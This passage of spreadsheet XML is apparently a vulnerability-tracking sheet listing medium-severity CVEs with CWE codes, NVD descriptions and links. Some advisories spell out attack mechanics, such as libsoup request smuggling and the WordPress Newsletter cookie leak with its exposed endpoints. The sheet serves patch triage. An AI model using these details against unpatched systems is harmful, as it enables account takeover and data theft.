      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100508</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102144</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>A resource exhaustion vulnerability in Kiteworks Email Protection Gateway allowed an unauthenticated remote attacker to repeatedly trigger a comparatively expensive server-side operation, causing a partial denial of service.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102144</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103241</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in vllm-project vLLM up to 0.26.0. This vulnerability affects unknown code of the file rust/src/parser/src/unified/gemma4.rs of the component Gemma4UnifiedParser. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been published and may be used. Upgrading to version 0.29.1rc0 is able to resolve this issue. This patch is called 3439bad37e68ba9755a46f4f6b44a4aeaf1f60a9. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103241</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103396</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>bbs-go through 4.4.6 contains a permission bypass vulnerability in the AdminMiddleware authorization logic where the read-only dashboard.user.view permission rule matches the /api/admin/user/synccount endpoint before the intended dashboard.user.update rule. Authenticated users with only view permissions can call the synccount endpoint to trigger expensive full-table user recounts and cache invalidations, causing denial of service through repeated concurrent database operations.</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103396</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103399</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SoupServer (libsoup). When an HTTP/1.x client sends a request with Expect: 100-continue and a request body, and SoupServer returns an early final (non-1xx) response before the body is read, the server neither drains the declared body bytes nor closes the connection. On a keep-alive connection, those leftover bytes are interpreted as a subsequent HTTP request. A remote, unauthenticated attacker can place a complete HTTP request in the body and cause SoupServer to process that smuggled request, leading to unintended request handling.</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103399</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103476</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 fails to validate article publication status in the attachment-download endpoint, allowing unauthenticated attackers to download files from draft articles. Attackers can enumerate sequential attachment identifiers to retrieve files from unpublished articles without authentication or authorization checks.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103476</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103532</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr">
        <is>
          <t>github</t>
        </is>
      </c>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in immich-app Immich up to 2.7.5. This affects the function checkSharedLinkAccess of the file server/src/utils/access.ts of the component Shared Link Preview Handler. The manipulation of the argument Password leads to improper authorization. The attack may be initiated remotely. The reported GitHub issue was closed with the label "duplicate".</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103532</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103548</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>psirt@paloaltonetworks.com</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>CWE-257, CWE-260, CWE-261</t>
        </is>
      </c>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>Improperly stored passwords in the config file in Itron MV-90 xi 3.0 allows attackers to decode the passwords and password histories to gain access to the MV-90 application as any user.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103548</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86778</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in Maksisoft Technology, IT, and Software Industry and Trade Inc. Maksisoft Gym allows Account Footprinting.
This issue affects Maksisoft Gym: from 0.5.10 before 0.5.11.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86778</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92537</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>The Newsletter – Send awesome emails from WordPress plugin for WordPress is vulnerable to Insufficiently Protected Credentials in all versions up to, and including, 9.3.9 The plugin's public click-tracking REST route `/tnp/l/` is registered with `permission_callback =&gt; '__return_true'` and, upon receiving a valid keyed-MD5 signature, calls `set_user_cookie()`, which emits a `Set-Cookie: newsletter=&lt;id&gt;-&lt;raw_token&gt;` response header to the requester because the subscriber object loaded via `get_user()` lacks the `_trusted` property, causing `get_user_key()` to return the raw token column value instead of its MD5-masked variant. This makes it possible for unauthenticated attackers who obtain any signed click-tracking URL for a target subscriber to receive that subscriber's permanent raw authentication cookie, which they can then use to export the subscriber's full PII record via the JSON profile-export endpoint (`?na=px`), rewrite the subscriber's stored profile (`?na=ps`), and silently unsubscribe the subscriber via the RFC-8058 one-click endpoint (`?na=ocu`), none of which require a nonce, password, or email challenge. Signed tracking URLs are embedded in every external link of every newsletter delivered to a subscriber, carry no timestamp, and never expire until the site's relink key rotates, meaning that any party who observes such a URL — through a forwarded email, a shared inbox, a mail-gateway log, or Referer headers on the redirect target, which has no Referrer-Policy set — can replay it indefinitely to obtain the victim's credential.</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92537</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92548</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>The WP Popular Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.4.2 via the 'context' parameter. This makes it possible for unauthenticated attackers to extract sensitive edit-context fields — including raw title, raw content body, password, meta, status, and guid — from non-public post objects such as wp_block synced patterns that WordPress core itself refuses to expose to unauthenticated callers. This is possible because the plugin's REST route is registered with a permission_callback of __return_true and passes the caller-supplied context parameter (e.g., context=edit) directly to WP_REST_Posts_Controller::prepare_item_for_response() without invoking get_item_permissions_check() or check_read_permission(), while the underlying query accepts an arbitrary post_type value without enforcing public or show_in_rest visibility flags.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92548</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92872</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>Pgpool-II inserts sensitive information into log file, which may allow an authenticated attacker to obtain the cluster information.</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92872</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93547</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>security@vaadin.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr">
        <is>
          <t>maven</t>
        </is>
      </c>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>A missing authorization check in the Vaadin Spreadsheet component allows an authenticated user of an application that renders a spreadsheet to add or replace cell comments on a sheet that has protection enabled, including on cells that are locked. Writing a comment to a cell that does not exist yet also creates the row and the cell.
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version
Vaadin 23.1.0 - 23.6.13
Vaadin 24.0.0 - 24.9.21
Vaadin 24.10.0 - 24.10.9
Vaadin 25.0.0 - 25.1.11
Vaadin 25.2.0 - 25.2.6
Vaadin Framework 7 and 8 with the Spreadsheet add-on 2.0.0 - 3.1.0
Mitigation
Upgrade to 23.6.14
Upgrade to 24.9.22
Upgrade to 24.10.10
Upgrade to 25.1.12
Upgrade to 25.2.7 or newer
Upgrade the Spreadsheet add-on to 3.1.1
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, 25 version.
Artifacts
Maven coordinates Vulnerable versions Fixed version
com.vaadin:vaadin 23.1.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin 24.0.0 - 24.9.21 &gt;=24.9.22
com.vaadin:vaadin 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-spreadsheet-flow 23.1.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin-spreadsheet-flow 24.0.0 - 24.9.21 &gt;=24.9.22
com.vaadin:vaadin-spreadsheet-flow 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-spreadsheet-flow 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-spreadsheet-flow 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-spreadsheet 2.0.0 - 3.1.0 &gt;=3.1.1</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93547</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94545</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>Satori is a library to convert HTML and CSS to SVG. Starting in version 0.0.27 and prior to version 0.33.5, Satori does not properly escape certain values before including them in generated SVG output. This can allow crafted values to be interpreted as SVG markup. The impact depends on how the generated SVG is consumed. Version 0.33.5 contains a patch. No complete workaround exists besides upgrading. Applications that cannot immediately upgrade should not render attacker-controlled content with Satori.</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94545</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94673</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Simply Schedule Appointments &lt;= 1.6.12.31 versions.</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94673</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97066</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
